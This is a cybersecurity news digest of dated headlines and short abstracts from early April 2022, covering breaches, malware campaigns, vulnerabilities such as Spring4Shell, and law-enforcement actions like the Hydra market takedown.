Hackers Distributing Fake Shopping Apps to Steal Banking Data of Malaysian Users Full Text

Abstract Threat actors have been distributing malicious applications under the guise of seemingly harmless shopping apps to target customers of eight Malaysian banks since at least November 2021. The attacks involved setting up fraudulent but legitimate-looking websites to trick users into downloading the apps, Slovak cybersecurity firm ESET said in a report shared with The Hacker News. The copycat websites impersonated cleaning services such as Maid4u, Grabmaid, Maria's Cleaning, Maid4u, YourMaid, Maideasy and MaidACall and a pet store named PetsMore, all of which are aimed at users in Malaysia. "The threat actors use these fake e-shop applications to phish for banking credentials," ESET  said . "The apps also forward all SMS messages received by the victim to the malware operators in case they contain 2FA codes sent by the bank." The targeted banks include Maybank, Affin Bank, Public Bank Berhad, CIMB bank, BSN, RHB, Bank Islam Malaysia, and Hong Leong Bank. Th

The Hacker News

April 6, 2022 – Attack

Ukraine warns of attacks aimed at taking over Telegram accounts Full Text

Abstract Ukraine's technical security and intelligence service warns of threat actors targeting aimed at gaining access to users' Telegram accounts. State Service of Special Communication and Information Protection (SSSCIP) of Ukraine spotted a new wave of cyber...

Security Affairs

April 06, 2022 – Outage

UK retail chain The Works shuts down stores after cyberattack Full Text

Abstract British retail chain The Works announced it was forced to shut down several stores due to till issues caused by a cyber-security incident involving unauthorized access to its computer systems.

BleepingComputer

April 6, 2022 – Business

Tufin Enters Into Definitive Agreement to be Acquired by Turn/River Capital in a $570 million Transaction Full Text

Abstract Tufin announced that it has entered into a definitive agreement to be acquired by Turn/River Capital, a software-focused investment firm, in an all-cash transaction that values the company at about $570 million.

Yahoo! Finance

April 06, 2022 – Government

Ukraine Warns of Cyber attack Aiming to Hack Users’ Telegram Messenger Accounts Full Text

Abstract Ukraine's technical security and intelligence service is warning of a new wave of cyber attacks that are aimed at gaining access to users' Telegram accounts. "The criminals sent messages with malicious links to the Telegram website in order to gain unauthorized access to the records, including the possibility to transfer a one-time code from SMS," the State Service of Special Communication and Information Protection (SSSCIP) of Ukraine  said  in an alert. The attacks , which have been attributed to a threat cluster called "UAC-0094," originate with Telegram messages alerting recipients that a login had been detected from a new device located in Russia and urging the users to confirm their accounts by clicking on a link. The URL, in reality a phishing domain, prompts the victims to enter their phone numbers as well as the one-time passwords sent via SMS that are then used by the threat actors to take over the accounts. The modus operandi  mirrors  that

The Hacker News

April 6, 2022 – Breach

Block discloses data breach involving Cash App potentially impacting 8.2 million US customers Full Text

Abstract Block disclosed a data breach related to the Cash App investing app and is notifying 8.2 million current and former US customers. The data breach involved a former employee that downloaded some unspecified reports of its Cash App Investing app that...

Security Affairs

April 06, 2022 – Vulnerabilities

VMware warns of critical vulnerabilities in multiple products Full Text

Abstract VMware has warned customers to immediately patch critical vulnerabilities in multiple products that could be used by threat actors to launch remote code execution attacks.

BleepingComputer

April 6, 2022 – Government

Australia to develop a data security framework Full Text

Abstract The Australian Department of Home Affairs has commenced work on a new national data security action plan as part of the federal government's wider digital economy strategy.

ZDNet

April 06, 2022 – Insider Threat

Block Admits Data Breach Involving Cash App Data Accessed by Former Employee Full Text

Abstract Block, the company formerly known as Square, has disclosed a data breach that involved a former employee downloading unspecified reports pertaining to its Cash App Investing that contained information about its U.S. customers. "While this employee had regular access to these reports as part of their past job responsibilities, in this instance these reports were accessed without permission after their employment ended," the firm  revealed  in a April 4 filing with the U.S. Securities and Exchange Commission (SEC). Block  advertises  Cash App as "the easiest way to send money, spend money, save money, and buy cryptocurrency." The breach is said to have occurred last year on December 10, 2021, with the downloaded reports including customers' full names as well as their brokerage account numbers, and in some cases, brokerage portfolio value, brokerage portfolio holdings, and stock trading activity for one trading day. The San Francisco-based company emphasized

The Hacker News

April 6, 2022 – Policy and Law

U.S. Treasury Department sanctions darkweb marketplace Hydra Market Full Text

Abstract The U.S. Treasury Department sanctioned the Hydra Market, the world's largest and longest-running dark web marketplace. The U.S. Treasury Department sanctioned the darkweb marketplace Hydra Market, the same day Germany’s Federal Criminal Police...

Security Affairs

April 06, 2022 – Botnet

US disrupts Russian Cyclops Blink botnet before being used in attacks Full Text

Abstract US government officials announced today the disruption of the Cyclops Blink botnet controlled by the Russian-backed Sandworm hacking group before being used in attacks.

BleepingComputer

April 6, 2022 – Education

Digital transformation requires security intelligence Full Text

Abstract It’s no surprise that many organizations are struggling with how to best manage their data and secure it, especially when data and systems reside not only in separate siloes, but within different teams, on-premises, and in the cloud.

Help Net Security

April 06, 2022 – Government

U.S. Treasury Department Sanctions Russia-based Hydra Darknet Marketplace Full Text

Abstract The U.S. Treasury Department on Tuesday sanctioned Hydra, the same day German law enforcement authorities  disrupted  the world's largest and longest-running dark web marketplace following a coordinated operation in partnership with U.S. officials. The sanctions are part of an "international effort to disrupt proliferation of malicious cybercrime services, dangerous drugs, and other illegal offerings available through the Russia-based site," the Treasury Department  said  in a statement. Along with the sanctions, the Office of Foreign Assets Control (OFAC) disclosed a list of  more than 100 virtual currency addresses  that have been identified as associated with the entity's operations to conduct illicit transactions. The sanctions come as Germany's Federal Criminal Police Office shut down the online criminal marketplace that it said specialized in narcotics trade, seizing its servers and 543 bitcoins worth 23 million euros ($25.3 million). Hydra was a Russi

The Hacker News

April 6, 2022 – Outage

A cyber attack forced the wind turbine manufacturer Nordex Group to shut down some of IT systems Full Text

Abstract Nordex Group, one of the largest manufacturers of wind turbines, was hit by a cyberattack that forced the company to shut down part of its infrastructure.  Nordex Group, one of the world’s largest manufacturers of wind turbines, was the victim...

Security Affairs

April 06, 2022 – Criminals

U.S. sanctions crypto-exchange Garantex for aiding Hydra Market Full Text

Abstract The U.S. Department of the Treasury's Office has announced sanctions against the cryptocurrency exchange Garantex, which has been linked to illegal transactions for Hydra Market.

BleepingComputer

April 6, 2022 – Malware

Fake Android Shopping Applications Steal Bank Account Logins, 2FA Codes Full Text

Abstract On Wednesday, ESET's cybersecurity team published new research documenting three separate fake apps targeting customers who belong to eight Malaysian banks to steal their account logins.

ZDNet

April 6, 2022 – Policy and Law

Germany police shut down Hydra Market dark web marketplace Full Text

Abstract Germany's Federal Criminal Police Office shut down Hydra Market, the Russian-language darknet marketplace specialized in drug dealing. Germany's Federal Criminal Police Office, the Bundeskriminalamt (BKA), announced they have shut down Hydra, one of the world's...

Security Affairs

April 6, 2022 – Vulnerabilities

Cyber Threats at Retail Endpoints Giving Way to Data Theft Full Text

Abstract Although e-Commerce sites are frequently targeted by cyberattackers, there isn’t much attention paid to the cybersecurity measures at brick-and-mortar retailers. Hackers target local stores for a variety of reasons including personal data theft, skimming payment card details, and sometimes extorti ... Read More

Cyware Alerts - Hacker News

April 05, 2022 – Phishing

Ukraine: Russian Armageddon phishing targets EU govt agencies Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) has spotted new phishing attempts attributed to the Russian threat group tracked as Armageddon (Gamaredon).

BleepingComputer

April 05, 2022 – Phishing

Australia warns of money recovery phishing luring past victims Full Text

Abstract The Australian Competition & Consumer Commission has published an announcement to raise awareness about a spike in money recovery scams.

BleepingComputer

April 5, 2022 – Ransomware

IPfuscation is Hive’s New Technique to Evade Detection Full Text

Abstract Hive ransomware gang is using a new IPfuscation tactic to hide its payload wherein they hide 64-bit Windows executables in the form of an array of ASCII IPv4 addresses. Additionally, the researchers spotted additional IPfuscation variants using IPv6 instead of IPv4 addresses, UUIDs, and MAC addres ... Read More

Cyware Alerts - Hacker News

April 05, 2022 – Hacker

FIN7 Hackers Leveraging Password Reuse and Software Supply Chain Attacks Full Text

Abstract The notorious cybercrime group known as FIN7 has diversified its initial access vectors to incorporate software supply chain compromise and the use of stolen credentials, new research has revealed. "Data theft extortion or ransomware deployment following FIN7-attributed activity at multiple organizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various ransomware operations over time," incident response firm Mandiant  said  in a Monday analysis. The cybercriminal group, since its emergence in the mid-2010s, has gained notoriety for large-scale malware campaigns targeting the point-of-sale (POS) systems aimed at restaurant, gambling, and hospitality industries with credit card-stealing malware. FIN7's shift in monetization strategy towards ransomware follows an October 2021 report from Recorded Future's Gemini Advisory unit, which  found  the adversary setting up a fake front company named Bastion Secure to recruit unwitt

The Hacker News

April 5, 2022 – APT

Russia-linked Armageddon APT targets Ukrainian state organizations, CERT-UA warns Full Text

Abstract Ukraine CERT-UA spotted a spear-phishing campaign conducted by Russia-linked Armageddon APT targeting local state organizations. Ukraine CERT-UA published a security advisory to warn of spear-phishing attacks conducted by Russia-linked Armageddon...

Security Affairs

April 05, 2022 – Breach

Cash App notifies 8.2 million US customers about data breach Full Text

Abstract Cash App is notifying 8.2 million current and former US customers of a data breach after a former employee accessed their account information.

BleepingComputer

April 5, 2022 – Botnet

Beastmode Botnet Adds New Exploits to its Arsenal Full Text

Abstract According to Fortinet, BeastMode attempts to infect TOTOLINK routers by exploiting several vulnerabilities. The threat actors added the exploits just a week after the PoCs were publicly released on GitHub.

Cyware Alerts - Hacker News

April 05, 2022 – Education

Battling Cybersecurity Risk: How to Start Somewhere, Right Now Full Text

Abstract Between a series of recent high-profile cybersecurity incidents and the heightened geopolitical tensions, there's rarely been a more dangerous cybersecurity environment. It's a danger that affects every organization – automated attack campaigns don't discriminate between targets. The situation is driven in large part due to a relentless rise in vulnerabilities, with tens of thousands of brand-new vulnerabilities discovered every year. For tech teams that are probably already under-resourced, guarding against this rising tide of threats is an impossible task. Yet, in the battle against cybercrime, some of the most effective and most sensible mitigations are sometimes neglected. In this article, we'll outline why cybersecurity risks have escalated so dramatically – and which easy wins your organization can make for a significant difference in your cybersecurity posture, right now. Recent major cyberattacks point to the danger Cyber security has arguably never been mo

The Hacker News

April 5, 2022 – Attack

Anonymous targets the Russian Military and State Television and Radio propaganda Full Text

Abstract Anonymous continues to support Ukraine against the Russian criminal invasion targeting the Russian military and propaganda. Anonymous leaked personal details of the Russian military stationed in Bucha where the Russian military carried out a massacre...

Security Affairs

April 05, 2022 – Hacker

Chinese hackers abuse VLC Media Player to launch malware loader Full Text

Abstract Security researchers have uncovered a long-running malicious campaign from hackers associated with the Chinese government who are using VLC Media Player to launch a custom malware loader.

BleepingComputer

April 5, 2022 – Business

Coro secures $60M at ~$500M valuation for an all-in, SaaS-based cyber protection platform aimed at SMBs Full Text

Abstract Alongside this latest round, the company is also disclosing for the first time an additional $20 million raised in the last six months, bringing the total to $80 million in the period.

Tech Crunch

April 05, 2022 – Criminals

Germany Shuts Down Russian Hydra Darknet Market; Seizes $25 Million in Bitcoin Full Text

Abstract Germany's Federal Criminal Police Office, the Bundeskriminalamt (BKA), on Tuesday announced the official takedown of Hydra, the world's largest illegal dark web marketplace that has cumulatively facilitated over $5 billion in Bitcoin transactions to date. "Bitcoins amounting to currently the equivalent of approximately €23 million were seized, which are attributed to the marketplace," the BKA said in a press release. Blockchain analytics firm Elliptic confirmed that the seizure occurred on April 5, 2022 in a series of 88 transactions amounting to 543.3 BTC. The agency attributed the shutdown of Hydra to an extensive investigation operation conducted by its Central Office for Combating Cybercrime (ZIT) in partnership with U.S. law enforcement authorities since August 2021. Launched in 2015, Hydra was a Russian-language darknet marketplace that opened as a competitor to the now-defunct Russian Anonymous Marketplace (aka RAMP), primarily known for its high-traffic

The Hacker News

April 5, 2022 – Vulnerabilities

CISA adds Spring4Shell flaw to its Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. CISA added the recently disclosed remote code execution (RCE) vulnerability Spring4Shell to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the recently disclosed CVE-2022-22965 (aka...

Security Affairs

April 05, 2022 – Vulnerabilities

SpringShell attacks target about one in six vulnerable orgs Full Text

Abstract Roughly one out of six organizations worldwide that are impacted by the Spring4Shell zero-day vulnerability have already been targeted by threat actors, according to statistics from one cybersecurity company.

BleepingComputer

April 5, 2022 – Malware

AsyncRAT campaigns feature new version of 3LOSH crypter Full Text

Abstract The threat actor(s) behind these campaigns have been using 3LOSH to generate the obfuscated code responsible for the initial infection process. The same operator is likely distributing a variety of commodity RATs, such as AsyncRAT and LimeRAT.

Cisco Talos

April 05, 2022 – Attack

Researchers Trace Widespread Espionage Attacks Back to Chinese ‘Cicada’ Hackers Full Text

Abstract A Chinese state-backed advanced persistent threat (APT) group known for singling out Japanese entities has been attributed to a new long-running espionage campaign targeting new geographies, suggesting a "widening" of the threat actor's targeting. The widespread intrusions, which are believed to have commenced at the earliest in mid-2021 and continued as recently as February 2022, have been tied to a group tracked as Cicada , which is also known as APT10, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team. "Victims in this Cicada (aka APT10) campaign include government, legal, religious, and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia, and North America," researchers from the Symantec Threat Hunter Team, part of Broadcom Software,  said  in a report shared with The Hacker News. "There is a strong focus on victims in the government and NGO sectors, with some of these organizations worki

The Hacker News

April 5, 2022 – Breach

MailChimp breached, intruders conducted phishing attacks against crypto customers Full Text

Abstract Threat actors gained access to internal tools of the email marketing giant MailChimp to conduct phishing attacks against crypto customers. During the weekend, multiple owners of Trezor hardware cryptocurrency wallets reported having received...

Security Affairs

April 05, 2022 – Attack

Microsoft detects Spring4Shell attacks across its cloud services Full Text

Abstract Microsoft said that it's currently tracking a "low volume of exploit attempts" targeting the critical Spring4Shell (aka SpringShell) remote code execution (RCE) vulnerability across its cloud services.

BleepingComputer

April 5, 2022 – Outage

The Works hit by hackers, UK retailer shuts some stores after problems with payment tills Full Text

Abstract UK high street retailer The Works was forced to shut some of its stores following a "cyber security incident" which saw hackers gaining unauthorized access to its systems.

Bit Defender

April 05, 2022 – General

Is API Security on Your Radar? Full Text

Abstract With the growth in digital transformation, the API management market is set to grow  by more than 30%   by the year 2025 as more businesses build web APIs and consumers grow to rely on them for everything from mobile apps to customized digital services. As part of strategic business planning, an API helps generate revenue by allowing customers access to the functionality of a website or computer program through custom applications. As more and more businesses are implementing APIs, the risk of API attacks increases. By 2022, Gartner predicted that API (Application Programming Interface) attacks would become the most common attack vector for enterprise web applications. Cybercriminals are targeting APIs more aggressively than ever before, and businesses must take a proactive approach to  API security  to combat this new aggression. API and The Business World With integrating APIs into modern IT environments, businesses are becoming increasingly data-driven. Just as a restaurant

The Hacker News

April 05, 2022 – Vulnerabilities

Microsoft adds on-premises Exchange, SharePoint to bug bounty program Full Text

Abstract Microsoft has announced that Exchange, SharePoint, and Skype for Business on-premises are now part of the Applications and On-Premises Servers Bounty Program starting today.

BleepingComputer

April 5, 2022 – Malware

Thwarting Loaders: From SocGholish to BLISTER’s LockBit Payload Full Text

Abstract SocGholish has been around longer than BLISTER, having already established itself well among threat actors for its advanced delivery framework. Reports show that its framework of attack has previously been used by threat actors from as early as 2020.

Trend Micro

April 05, 2022 – Breach

Hackers Breach Mailchimp Email Marketing Firm to Launch Crypto Phishing Scams Full Text

Abstract Email marketing service Mailchimp on Monday revealed a data breach that resulted in the compromise of an internal tool to gain unauthorized access to customer accounts and stage phishing attacks.  The development was first  reported  by Bleeping Computer. The company, which was acquired by financial software firm Intuit in September 2021, told the publication that it became aware of the incident on March 26 when it became aware of a malicious party accessing the customer support tool. "The incident was propagated by an external actor who conducted a successful social engineering attack on Mailchimp employees, resulting in employee credentials being compromised," Siobhan Smyth, Mailchimp's chief information security officer, was quoted as saying. Although Mailchimp stated it acted quickly to terminate access to the breached employee account, the siphoned credentials were used to access 319 MailChimp accounts and further export the mailing lists pertaining to 102 acc

The Hacker News

April 05, 2022 – Solution

Microsoft announces new Windows 11 security, encryption features Full Text

Abstract Microsoft says that Windows 11 will get more security improvements in upcoming releases, which will add more protection against cybersecurity threats, offer better encryption, and block malicious apps and drivers.

BleepingComputer

April 5, 2022

MacOS SUHelper Root Privilege Escalation Vulnerability: A Deep Dive Into CVE-2022-22639 Full Text

Abstract Designated as CVE-2022-22639, the vulnerability could allow root privilege escalation if successfully exploited. After discovering the flaw, we reported it to Apple, hence the release of a patch through the macOS Monterey 12.3 security update.

Trend Micro

April 05, 2022 – Government

CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework, to its  Known Exploited Vulnerabilities Catalog  based on "evidence of active exploitation." The critical severity flaw, assigned the identifier  CVE-2022-22965  (CVSS score: 9.8) and dubbed "Spring4Shell", impacts Spring model–view–controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later. "Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application," Praetorian researchers Anthony Weems and Dallas Kaman noted last week. Although exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard  said  "active scanning for this vulnerability has been observed coming fro

The Hacker News

April 05, 2022 – Phishing

Ukraine spots Russian-linked ‘Armageddon’ phishing attacks Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) has spotted new phishing attempts attributed to the Russian threat group tracked as Armageddon (Gamaredon).

BleepingComputer

April 5, 2022 – Vulnerabilities

Yokogawa Patches Flaws Allowing Disruption, Manipulation of Physical Processes Full Text

Abstract Japanese automation giant Yokogawa recently patched a series of vulnerabilities in control system products that, according to researchers, can be exploited for the disruption or manipulation of physical processes.

Security Week

April 04, 2022 – Malware

WhatsApp voice message phishing emails push info-stealing malware Full Text

Abstract A new WhatsApp phishing campaign impersonating WhatsApp's voice message feature has been discovered, attempting to spread information-stealing malware to at least 27,655 email addresses.

BleepingComputer

April 4, 2022 – Vulnerabilities

Serious RCE Bug Found in Spring Cloud Full Text

Abstract A serious vulnerability has been discovered in the Spring Cloud Java Framework that may lead to RCE or result in the compromise of an entire host. Tracked as Spring4 Shell, it was found circulating on a Chinese cybersecurity site and QQ chat service. Currently, a way to partially stop Spring4Shell ... Read More

Cyware Alerts - Hacker News

April 04, 2022 – Privacy

Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers Full Text

Abstract An Android spyware application has been spotted masquerading as a "Process Manager" service to stealthily siphon sensitive information stored in the infected devices. Interestingly, the app — that has the package name " com.remote.app " — establishes contact with a remote command-and-control server, 82.146.35[.]240, which has been previously identified as infrastructure belonging to the Russia-based hacking group known as  Turla . "When the application is run, a warning appears about the permissions granted to the application," Lab52 researchers  said . "These include screen unlock attempts, lock the screen, set the device global proxy, set screen lock password expiration, set storage encryption and disable cameras." Once the app is "activated," the malware removes its gear-shaped icon from the home screen and runs in the background, abusing its wide permissions to access the device's contacts and call logs, track its location,

The Hacker News

April 4, 2022 – Vulnerabilities

VMware released updates to fix the Spring4Shell vulnerability in multiple products Full Text

Abstract VMware released security updates to address the critical remote code execution vulnerability known as Spring4Shell. VMware has published security updates to address the critical remote code execution vulnerability known as Spring4Shell (CVE-2022-22965)....

Security Affairs

April 04, 2022 – Solution

GitHub can now auto-block commits containing API keys, auth tokens Full Text

Abstract GitHub announced on Monday that it expanded its code hosting platform's secrets scanning capabilities for GitHub Advanced Security customers to automatically block secret leaks.

BleepingComputer

April 4, 2022 – Cryptocurrency

Mars Stealer’s Cryptomining Attack Campaign Targets OpenOffice Full Text

Abstract Morphisec laid bare a new Mars Stealer campaign—abusing Google Ads ranking techniques—to lure Canadian users into downloading a malicious version of OpenOffice. A bug in the configuration instructions of the cracked version of Mars Stealer, which appears to be an honest mistake by the operators, gi ... Read More

Cyware Alerts - Hacker News

April 04, 2022 – Hacker

Multiple Hacker Groups Capitalizing on Ukraine Conflict for Distributing Malware Full Text

Abstract At least three different advanced persistent threat (APT) groups from across the world have launched spear-phishing campaigns in mid-March 2022 using the ongoing Russo-Ukrainian war as a lure to distribute malware and steal sensitive information. The campaigns, undertaken by El Machete, Lyceum, and SideWinder, have targeted a variety of sectors, including energy, financial, and governmental sectors in Nicaragua, Venezuela, Israel, Saudi Arabia, and Pakistan. "The attackers use decoys ranging from official-looking documents to news articles or even job postings, depending on the targets and region," Check Point Research  said  in a report. "Many of these lure documents utilize malicious macros or template injection to gain an initial foothold into the targeted organizations, and then launch malware attacks." The infection chains of  El Machete , a Spanish-speaking threat actor first documented in August 2014 by Kaspersky, involve the use of macro-laced decoy doc

The Hacker News

April 4, 2022 – APT

Experts spotted a new Android malware while investigating by Russia-linked Turla APT Full Text

Abstract Researchers spotted a new piece of Android malware while investigating activity associated with Russia-linked APT Turla. Researchers at cybersecurity firm Lab52 discovered a new piece of Android malware while investigating into infrastructure associated...

Security Affairs

April 04, 2022 – Vulnerabilities

VMware patches Spring4Shell RCE flaw in multiple products Full Text

Abstract ​​​​​​​VMWare has published a security advisory for the critical remote code execution vulnerability known as Spring4Shell, which impacts multiple of its cloud computing and virtualization products.

BleepingComputer

April 4, 2022 – Vulnerabilities

Cisco software update blocks exploit chain in network management software Full Text

Abstract A security researcher was able to achieve unauthenticated remote code execution against Cisco Nexus Dashboard Fabric Controller by exploiting an obsolete Java library with known vulnerabilities.

The Daily Swig

April 04, 2022 – Vulnerabilities

Brokenwire Hack Could Let Remote Attackers Disrupt Charging for Electric Vehicles Full Text

Abstract A group of academics from the University of Oxford and Armasuisse S+T has disclosed details of a new attack technique against the popular Combined Charging System ( CCS ) that could potentially disrupt the ability to charge electric vehicles at scale. Dubbed " Brokenwire ," the method interferes with the control communications that transpire between the vehicle and charger to wirelessly abort the charging sessions from a distance of as far as 47m (151ft). "While it may only be an inconvenience for individuals, interrupting the charging process of critical vehicles, such as electric ambulances, can have life-threatening consequences," the researchers  explained . "Brokenwire has immediate implications for many of the 12 million battery EVs estimated to be on the roads worldwide — and profound effects on the new wave of electrification for vehicle fleets, both for private enterprise and for crucial public services." Additional details of the attack

The Hacker News

April 4, 2022 – Attack

Brokenwire attack, how hackers can disrupt charging for electric vehicles Full Text

Abstract Boffins devised a new attack technique, dubbed Brokenwire, against the Combined Charging System (CCS) that could potentially disrupt charging for electric vehicles. A group of researchers from the University of Oxford and Armasuisse S+T has devised...

Security Affairs

April 04, 2022 – Breach

Hackers breach MailChimp’s internal tools to target crypto customers Full Text

Abstract Email marketing firm MailChimp disclosed on Sunday that they had been hit by hackers who gained access to internal customer support and account management tools to steal audience data and conduct phishing attacks.

BleepingComputer

April 4, 2022 – Attack

Emma Sleep Company admits attack on online checkout Full Text

Abstract Emma Sleep Company has confirmed to The Reg that it suffered a Magecart attack which enabled the cybercriminals to skim customers' credit or debit card data from its website.

The Register

April 04, 2022 – Malware

Experts Shed Light on BlackGuard Infostealer Malware Sold on Russian Hacking Forums Full Text

Abstract A previously undocumented "sophisticated" information-stealing malware named BlackGuard is being advertised for sale on Russian underground forums for a monthly subscription of $200. "BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients," Zscaler ThreatLabz researchers Mitesh Wani and Kaivalya Khursale  said  in a report published last week. Also sold for a lifetime price of $700, BlackGuard is designed as a .NET-based malware that's actively under development, boasting of a number of anti-analysis, anti-debugging, and anti-evasion features that allows it to kill processes related to antivirus engines and bypass string-based detection. What's more, it checks the IP address of the infected devices by sending a request to the domain "https://ipwhois[.]app/xml/," and exit itself if the country is one among the Commonwealth of Indep

The Hacker News

April 4, 2022 – Malware

Borat RAT, a new RAT that performs ransomware and DDoS attacks Full Text

Abstract Cyble researchers discovered a new remote access trojan (RAT) named Borat capable of conducting DDoS and ransomware attacks. Researchers from threat intelligence firm Cyble discovered a new RAT, named Borat, that enables operators to gain full access...

Security Affairs

April 04, 2022 – Hacker

FIN7 hackers evolve toolset, work with multiple ransomware gangs Full Text

Abstract Threat analysts have compiled a detailed technical report on FIN7 operations from late 2021 to early 2022, showing that the actor is still very active, evolving, and trying new monetization methods.

BleepingComputer

April 4, 2022 – Phishing

“Free easter chocolate basket” is a social media scam after your personal details Full Text

Abstract Cadbury UK has issued a warning to its 315,000 followers on Twitter about a scam making the rounds on WhatsApp and other social media sites like Facebook. The Dorset Police Cyber Crime Unit posted an appeal about this scam on its Facebook page.

Malwarebytes Labs

April 04, 2022 – Denial Of Service

Beastmode DDoS Botnet Exploiting New TOTOLINK Bugs to Enslave More Routers Full Text

Abstract A variant of the Mirai botnet called Beastmode has been observed adopting newly disclosed vulnerabilities in TOTOLINK routers between February and March 2022 to infect unpatched devices and expand its reach potentially. "The Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits," Fortinet's FortiGuard Labs Research team  said . "Five new exploits were added within a month, with three targeting various models of TOTOLINK routers." The list of exploited vulnerabilities in TOTOLINK routers is as follows - CVE-2022-26210  (CVSS score: 9.8) - A command injection vulnerability that could be exploited to gain arbitrary code execution CVE-2022-26186  (CVSS score: 9.8) - A command injection vulnerability affecting TOTOLINK N600R and A7100RU routers, and CVE-2022-25075 to CVE-2022-25084  (CVSS scores: 9.8) - A command injection vulnerability impacting multiple TOTOLINK routers, leading to code execution The other e

The Hacker News

April 4, 2022 – Vulnerabilities

Experts discovered 15-Year-Old vulnerabilities in the PEAR PHP repository Full Text

Abstract SonarSource discovered a 15-year-old flaw in the PEAR PHP repository that could have enabled supply chain attacks. Researchers from SonarSource discovered two 15-year-old security flaws in the PEAR (PHP Extension and Application Repository) repository...

Security Affairs

April 4, 2022 – Breach

Cyberattack on Iberdrola Compromises Data of Millions of Customers in Spain Full Text

Abstract Spain’s energy giant Iberdrola has revealed that it suffered a cyberattack on March 15 which has affected 1.3 million customers, although the company has reassured that the hackers were unable to access “sensitive” information such as bank details.

spanishnewstoday

April 4, 2022 – Breach

Anonymous leaked 15 GB of data allegedly stolen from the Russian Orthodox Church Full Text

Abstract After claiming to hack the private firms Thozis Corp and Marathon Group owned by oligarchs, the collective announced the hack of the Russian Orthodox Church’s charitable wing and leaked 15GB of data along with 57,000 emails.

Security Affairs

April 03, 2022 – Cryptocurrency

Fake Trezor data breach emails used to steal cryptocurrency wallets Full Text

Abstract A compromised Trezor hardware wallet mailing list was used to send fake data breach notifications to steal cryptocurrency wallets and the assets stored within them.

BleepingComputer

April 3, 2022 – Breach

Documents reveal financial fallout of Salt Lake City IT security breach Full Text

Abstract That document, obtained by the KSL Investigators through a public records request, states more than 150 databases and all public safety software systems were reviewed for potential compromises but, "none have been found."

KSL

April 3, 2022 – APT

China-linked APT Deep Panda employs new Fire Chili Windows rootkit Full Text

Abstract The China-linked hacking group Deep Panda is targeting VMware Horizon servers with the Log4Shell exploit to install a new Fire Chili rootkit. Researchers from Fortinet have observed the Chinese APT group Deep Panda exploiting a Log4Shell exploit...

Security Affairs

April 03, 2022 – Malware

New Borat remote access malware is no laughing matter Full Text

Abstract A new remote access trojan (RAT) named Borat has appeared on darknet markets, offering easy-to-use features to conduct DDoS attacks, UAC bypass, and ransomware deployment.

BleepingComputer

April 3, 2022 – General

Supply Chain Attacks Against Open-Source Software Soar Full Text

Abstract Towards the beginning of March, researchers from Sonatype identified hundreds of counterfeit packages in npm and PyPI repositories that were used to execute Remote Access Trojans (RATs).

Cyware Alerts - Hacker News

April 3, 2022 – Government

Mar 27 – Apr 02 Ukraine – Russia the silent cyber conflict Full Text

Abstract This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Apr 02 - Anonymous leaked 15 GB of data allegedly stolen from the Russian Orthodox Church Anonymous claims to have hacked...

Security Affairs

April 3, 2022 – General

Security Affairs newsletter Round 359 by Pierluigi Paganini Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

April 02, 2022 – Policy and Law

UK charges two teenagers linked to the Lapsus$ hacking group Full Text

Abstract Two teenagers from the UK charged with helping the Lapsus$ extortion gang have been released on bail after appearing in the Highbury Corner Magistrates Court court on Friday morning.

BleepingComputer

April 2, 2022 – Ransomware

Hive Ransomware Evolves to Add Many New Features Full Text

Abstract Hive is a relatively new ransomware outfit that made its appearance in late June 2021. It gained notoriety through over 350 attacks on organizations across several sectors.

Cyware Alerts - Hacker News

April 02, 2022 – Outage

American Express down in outage: users report login and payment issues Full Text

Abstract Yesterday, American Express users across the world including US, UK, and Europe, experienced widespread outages lasting hours, and some users continue to. BleepingComputer was able to briefly reproduce issues right before Amex confirmed partially restoring services.

BleepingComputer

April 2, 2022 – Attack

Anonymous targets oligarchs’ Russian businesses: Marathon Group hacked Full Text

Abstract Anonymous continues to target Russian firms owned by oligarchs. After announcing the hack of the Thozis Corp, the group claimed they had breached the systems of the Marathon Group and released 62,000 emails (a 52GB archive) through DDoSecrets.

Security Affairs

April 2, 2022 – Breach

Anonymous leaked 15 GB of data allegedly stolen from the Russian Orthodox Church Full Text

Abstract Anonymous claims to have hacked the Russian Orthodox Church 's charitable wing and leaked 15 GB of alleged stolen data. Anonymous continues to target Russian government entities and private businesses, this week the group claimed to have hacked the private...

Security Affairs

April 2, 2022 – Phishing

Phishing attacks exploit free calendar app to steal account credentials Full Text

Abstract In a recent report, email security provider INKY described a recent phishing campaign that took advantage of the Calendly calendar app to harvest sensitive account credentials from unsuspecting victims.

Tech Republic

April 2, 2022 – Criminals

UK Police charges two teenagers for their alleged role in the Lapsus$ extortion group Full Text

Abstract The City of London Police charged two of the seven teenagers who were arrested for their alleged role in the LAPSUS$ data extortion gang. The duo has been released on bail after appearing in the Highbury Corner Magistrates Court court on Friday. The...

Security Affairs

April 2, 2022 – Breach

Ola Finance Says Attackers Stole $4.7M in ‘Re-Entrancy’ Exploit Full Text

Abstract Decentralized lending platform Ola Finance was exploited for over $4.67 million in a “re-entrancy” cyberattack, according to a post-mortem report released by the developers.

Yahoo! Finance

April 2, 2022 – Botnet

Beastmode Mirai botnet now includes exploits for Totolink routers Full Text

Abstract Operators behind the Mirai-based distributed denial-of-service (DDoS) botnet Beastmode (aka B3astmode) added exploits for Totolink routers. The Mirai-based distributed denial-of-service (DDoS) botnet Beastmode (aka B3astmode) now includes exploits...

Security Affairs

April 2, 2022 – Ransomware

